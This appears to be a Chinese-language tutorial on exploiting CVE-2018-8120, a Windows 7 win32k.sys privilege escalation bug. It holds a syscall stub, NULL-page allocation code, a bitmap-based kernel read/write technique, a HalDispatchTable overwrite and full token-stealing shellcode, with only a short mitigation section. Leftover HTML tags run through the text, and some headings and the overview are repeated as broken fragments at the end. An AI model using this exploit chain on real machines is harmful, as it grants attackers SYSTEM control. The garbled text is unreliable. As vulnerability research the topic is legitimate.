CVE-2018-8120 Windows提权漏洞分析与利用教程<\/h1>

1. 漏洞概述<\/h2>
CVE-2018-8120是Windows 7及Windows Server 2008系列中的一个经典本地提权漏洞，存在于`SetImeInfoEx<\/code>函数中。该漏洞允许攻击者通过精心构造的输入实现内核任意地址写入，最终可提升至SYSTEM权限。<\/p>`

2. 环境准备<\/h2>

测试环境<\/strong>：Windows 7 x86虚拟机(VMware)<\/li>
调试工具<\/strong>：Windbg<\/li>
必要知识<\/strong>：Windows内核基础、Win32 API编程<\/li>
<\/ul>
3. 漏洞分析<\/h2>
3.1 漏洞位置<\/h3>
漏洞存在于win32k.sys<\/code>驱动中的SetImeInfoEx<\/code>函数：<\/p>
void<\/span> SetImeInfoEx<\/span>(HWINSTA pWinStation, char<\/span>*<\/span> pInput)
<\/span><\/span>{
<\/span><\/span>    \/\/ 漏洞点：未验证pWinStation[5]是否合法就直接访问
<\/span><\/span><\/span><\/span>    if<\/span> (pWinStation[5<\/span>]) {
<\/span><\/span>        qmemcpy(pWinStation[5<\/span>] +<\/span> 0x2c<\/span>, pInput +<\/span> 0x14<\/span>, 0x54<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.2 调用链分析<\/h3>

系统调用NtUserSetImeInfoEx<\/code>调用SetImeInfoEx<\/code><\/li>
SetImeInfoEx<\/code>的第一个参数来自GetProcessWindowsStation<\/code><\/li>
pWinStation<\/code>是Window Station的Handle（内核对象引用）<\/li>
<\/ol>
3.3 关键结构<\/h3>

Window Station对象<\/strong>：spklList<\/code>成员默认为NULL（偏移0x14）<\/li>
当pWinStation[5]<\/code>为NULL时，直接访问会导致内核空指针解引用<\/li>
<\/ul>
4. 漏洞利用开发<\/h2>
4.1 基础POC构造<\/h3>
由于NtUserSetImeInfoEx<\/code>未公开导出，需要手动实现系统调用：<\/p>
\/\/ Windows 7 x86系统调用号为0x1228
<\/span><\/span><\/span><\/span>__declspec<\/span>(naked<\/span>) NTSTATUS __stdcall<\/span> NtUserSetImeInfoEx(PVOID pInput)
<\/span><\/span>{
<\/span><\/span>    __asm<\/span> {
<\/span><\/span>        mov eax, 0x1228<\/span>
<\/span><\/span>        lea edx, [esp+<\/span>4<\/span>]
<\/span><\/span>        int<\/span> 0x2e<\/span>
<\/span><\/span>        ret 4<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.2 NULL地址分配技巧<\/h3>
利用NtAllocateVirtualMemory<\/code>分配包含NULL的地址空间：<\/p>
PVOID BaseAddress =<\/span> (PVOID)0x1<\/span>;
<\/span><\/span>SIZE_T RegionSize =<\/span> 0x1000<\/span>;
<\/span><\/span>NtAllocateVirtualMemory(
<\/span><\/span>    GetCurrentProcess(),
<\/span><\/span>    &<\/span>BaseAddress,
<\/span><\/span>    0<\/span>,
<\/span><\/span>    &<\/span>RegionSize,
<\/span><\/span>    MEM_RESERVE|<\/span>MEM_COMMIT|<\/span>MEM_TOP_DOWN,
<\/span><\/span>    PAGE_EXECUTE_READWRITE
<\/span><\/span>);
<\/span><\/span><\/code><\/pre>4.3 任意地址写构造<\/h3>
通过控制输入数据，实现任意地址写入：<\/p>

在NULL+0x14处构造目标地址<\/li>
在NULL+0x2c处构造写入数据<\/li>
触发qmemcpy<\/code>实现写入<\/li>
<\/ol>
限制<\/strong>：目标地址+0x18必须为0<\/p>
5. 提权技术实现<\/h2>
5.1 Token替换原理<\/h3>
Windows进程权限由_EPROCESS<\/code>结构中的Token控制：<\/p>

Token偏移：0xF8（Win7 x86）<\/li>
替换当前进程Token为SYSTEM进程Token即可提权<\/li>
<\/ul>
5.2 Bitmap技术利用<\/h3>
由于直接获取SYSTEM Token困难，使用Bitmap技术实现任意地址读：<\/p>


Bitmap结构关键成员<\/strong>：<\/p>

pvScan0<\/code>：指向像素数据的指针（用户\/内核共享）<\/li>
通过GDI共享句柄表可计算内核地址<\/li>
<\/ul>
<\/li>

利用步骤<\/strong>：<\/p>

创建两个Bitmap（Manager\/Worker）<\/li>
获取它们的pvScan0<\/code>内核地址<\/li>
利用漏洞修改Manager的pvScan0<\/code>指向Worker的pvScan0<\/code><\/li>
通过SetBitmapBits修改Worker的pvScan0<\/code>指向目标地址<\/li>
最终实现任意地址读写<\/li>
<\/ul>
<\/li>
<\/ol>
5.3 代码执行路径<\/h3>
通过覆盖HalDispatchTable<\/code>函数指针实现代码执行：<\/p>

定位hal!HaliQuerySystemInformation<\/code>（HalDispatchTable+0x4）<\/li>
覆盖为Shellcode地址<\/li>
触发NtQueryIntervalProfile<\/code>执行Shellcode<\/li>
<\/ol>
6. 完整利用流程<\/h2>

分配NULL地址空间并布置数据<\/li>
创建Manager\/Worker Bitmap<\/li>
计算Bitmap内核地址<\/li>
利用漏洞实现任意地址写能力<\/li>
修改HalDispatchTable函数指针<\/li>
部署提权Shellcode<\/li>
触发执行获取SYSTEM权限<\/li>
<\/ol>
7. 提权Shellcode示例<\/h2>
; Windows 7 x86提权Shellcode
<\/span><\/span><\/span><\/span>pushad<\/span>
<\/span><\/span>mov<\/span> eax<\/span>, fs<\/span>:[0x124<\/span>]    ; 获取_KTHREAD
<\/span><\/span><\/span><\/span>mov<\/span> eax<\/span>, [eax<\/span>+<\/span>0x150<\/span>]   ; 获取_EPROCESS
<\/span><\/span><\/span><\/span>mov<\/span> ecx<\/span>, eax<\/span>
<\/span><\/span>
<\/span><\/span>SearchSystemProcess:
<\/span><\/span>mov<\/span> eax<\/span>, [eax<\/span>+<\/span>0xb8<\/span>]    ; ActiveProcessLinks.Flink
<\/span><\/span><\/span><\/span>sub<\/span> eax<\/span>, 0xb8<\/span>
<\/span><\/span>cmp<\/span> [eax<\/span>+<\/span>0xb4<\/span>], 0x4<\/span>    ; UniqueProcessId是否为4(SYSTEM)
<\/span><\/span><\/span><\/span>jnz<\/span> SearchSystemProcess<\/span>
<\/span><\/span>
<\/span><\/span>mov<\/span> edx<\/span>, [eax<\/span>+<\/span>0xf8<\/span>]    ; SYSTEM Token
<\/span><\/span><\/span><\/span>mov<\/span> [ecx<\/span>+<\/span>0xf8<\/span>], edx<\/span>    ; 替换当前进程Token
<\/span><\/span><\/span><\/span>popad<\/span>
<\/span><\/span>ret<\/span>
<\/span><\/span><\/code><\/pre>8. 防御与缓解<\/h2>

安装微软官方补丁<\/li>
启用内核ASLR<\/li>
限制用户模式到内核模式的调用<\/li>
监控异常的内核内存访问<\/li>
<\/ol>
9. 参考资源<\/h2>

Windows内核结构文档<\/li>
ReactOS源码参考<\/li>
MSDN GDI\/Window Station API文档<\/li>
Windows系统调用表<\/li>
<\/ul>
通过本教程，您已全面了解CVE-2018-8120漏洞从分析到利用的全过程。实际利用时请注意测试环境稳定性，并确保符合法律法规要求。<\/p>

CVE-2018-8120 Windows提权漏洞分析与利用教程<\/h1>

1. 漏洞概述<\/h2> CVE-2018-8120是Windows 7及Windows Server 2008系列中的一个经典本地提权漏洞，存在于SetImeInfoEx<\/code>函数中。该漏洞允许攻击者通过精心构造的输入实现内核任意地址写入，最终可提升至SYSTEM权限。<\/p>

3. 漏洞分析<\/h2>

4. 漏洞利用开发<\/h2>

1. 漏洞概述<\/h2>
CVE-2018-8120是Windows 7及Windows Server 2008系列中的一个经典本地提权漏洞，存在于`SetImeInfoEx<\/code>函数中。该漏洞允许攻击者通过精心构造的输入实现内核任意地址写入，最终可提升至SYSTEM权限。<\/p>`